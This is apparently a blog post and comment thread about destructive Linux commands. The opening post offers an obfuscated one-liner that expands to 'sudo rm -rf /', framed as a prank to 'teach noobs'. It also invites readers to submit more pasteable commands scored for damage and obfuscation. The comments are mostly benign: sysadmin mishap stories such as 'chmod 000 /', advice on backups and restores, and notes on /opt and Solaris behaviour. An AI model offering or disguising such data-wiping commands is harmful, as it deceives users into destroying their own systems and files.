Here is my favorite bash script which can be used to teach noobs about bash syntax, man pages and the importance of backup at the same time:
s="r"; d="$s"m; f="$s"f; sudo $($d -$f /)
If not on Ubuntu, just get rid of sudo and tell people to run it as root. Oh, and if you copied and pasted this into your terminal to try what it does, I hope you backed up recently. I’m guessing it probably won’t delete everything (there would be some access violations and stuff) but it will probably do enough damage for you to hate me for the rest of your life.
Oh, and it won’t work on Solaris 10. I guess someone at Sun fell for some incarnation of this very trick at some point. :P
Btw, has anyone ever killed a system this way? What is the most damage you ever did to a linux system by issuing a reckless command as root?
Also, can you beat my denoobization script? Time to show your true BOFH skills. Points will be given for the magnitude of damage it causes, obfuscation and brevity. Btw, you should be able to copy and paste it into the terminal as a single line.
[tags]linux, rm, rm -rf, bofh, noob, unix[/tags]
This guy did it on a vm and made a video. I did something similar once – there is a big difference between “rm -r /” and “rm -r ./” – whoops. Luckily it was on my server and I have a dd & gzip script cronned that makes sure I always have a full OS backup (it is only like 1gb, since the server is gui-less and about as stripped down as can be safely done). I booted into failsafe mode, replaced hda1 with the dd file, and was on my way.
This is why I generally avoid running rm as root, and when I do I make sure I use the absolute path and avoid shortcuts and wild cards that could expand to something funky.
Sometimes I think rm should have a test option – ie rm -t would simply simulate the verbose output, but it would not actually delete anything.
I have never been able to destroy a system as a regular user with rm-rf /. I have done some moderate damage in Solaris with a user in GID 14 (sysadm).
Just about every “seasoned” sysadmin has accidentally typed something to result in rm -rf as root in a bad area. This is a great leason, as it teaches many sysadmin priciples:
1) Alter your command to make sure it is going to do what you think it will
When I use wildcards to do a mass removal, I always use ls with that command first. Then I use command history and change ls to rm. This way I know what is happening.
2) Learn how to restore from tape
Restoring a large amount of data from tape is not done often. This “little” exercise will quickly train an admin to document this process since it happens very little.
3) Test your backups
We never appreciate backups until we need them. I have always said that the most important part of backups is the restore.
4) Know your users and how to communicate with them.
The system will be down for a lengthy period of time while all the data is restored. You can bet the phone and/or pager will be ringing/beeping for a while.
5) Have a disaster recovery plan
If there is a guide, you won’t have to live in man pages or drag other employees into your problem
I can’t agree more with #3. It’s especially important when you are backing up a system with a failing hard drive. I learned it the hard way that ntbackup doesn’t like bad sectors on the disk, and will simply quit without warning if it doesn’t feel happy.
I was backing up two drives at the same time. One drive was fine, and it would be backed up normally. The other one would start backup and then quit after first 20 GB or so. Since the result was a single .bkf file usually sized at few hundred GB. I haven’t noticed this until that drive died, and I needed to restore it from backup.
Since ntbackup would just quit, the whole archive for that drive was corrupted and inaccessible. The backup of the second drive (one that didn’t die) was just fine. :(
A few years ago, I entered the command “chmod 000 /” while I was learning linux on a fedora 4 system. had to upgrade the entire os to fix it.
Wait… You should still be able to chmod files back to normal as root, no? Then again, setting the right permissions for the right files might be a pain in the ass.
[quote post=”2091″]Wait… You should still be able to chmod files back to normal as root, no? Then again, setting the right permissions for the right files might be a pain in the ass.[/quote]
Theoretically, yes. The perms should be in the RPM database, but getting access to all the binaries and libs needed would be a pain.
I accidentally did this on Solaris in /opt once. Fortunately, I didn’t require any file access in this directory to restore the perms. It took a long time to get all the perm information out of the package database, but I was successful in restoring it back to normal.
Btw, what does solaris put in /opt? On my Ubuntu box I currently just have bunch of packages that were either compiled from source, or came as generic binaries not from a repository. Here is what I have there right now:
Dit Defender
Eclipse
Firefox
GCalDaemon
Google Desktp
Komodo Edit
In other words my /opt is for shit that is not natively installed via apt, that likes to have it’s own program directory, windows style. And I actually like it this way. It keeps things clean. :)
/opt is “optional” software in UNIX. Solaris uses this dir to install SUN branded software that does not come packaged with Solaris. Examples include SunStudio, SunRay Server software. Some other groups use this area as well, like BlastWave (/opt/csw).
I think of it as /usr/local, but for commercial software. Anything I compile from source goes into /usr/local. Makes it much easier when building upgrading systems.
Oh, good tip. Next time I’m compiling something I’ll probably stick it in /usr/local which is mostly empty for me.
Actually, most of the things I compiled from source was nice enough to let me fakeroot it and turn it into a deb package which can then be maintained by apt. As long as apt knows where it lives, I don’t have to worry about it. :)
Oh wow! I got 7000 GET (look at the number on my comment – round 7000)! Wohoo!
Then again my comment is not very spectacular or meme worthy. Wasted get? :(
— GNU coreutils documentation
It seems that Sun took the “may become the default behavior” bit to heart since this is exactly what their version of rm does by default in Solaris 10. :)
Can anyone come up with a legitimate reason to do rm -rf /? I can’t think of a single instance when this would be useful. I mean from purely Unix point of view, if it’s syntactically legal, you should be able to do this. But when would you actually “need” it?
Yeah never run that command as root – luckily when I made the above mentioned mistake, I wasn’t running as root. Unluckily it hosed my /home/* directory so badly before I could stop it, it was worth restoring.
One time we had a box where users were allowed to create new files in any folder they wanted on the system but not given write privileges to any existing files (all the users were employees–trustworthy and all very capable, I was the only newb).
One guy left the group, and he had been big into adding his own stuff to the box, which was fine. But now he’d left and his crap was all over outside of /home/thisguy and we wanted to clean up after him. We knew the system ran fine without the stuff the guy added, so our sysadmin decided to just run rm -rf / as this user. It worked nicely, cleaned up all the stuff the user had created, left everything else intact.
Not being a *nix user I spent a while looking the command at the top trying to figure out how it would hose everything
It just clicked – the end bit refers to the beginning, replaces letters with other letters and comes up with rm -rf /
Which I know from teh interwebs is normally not a good thing to do… :)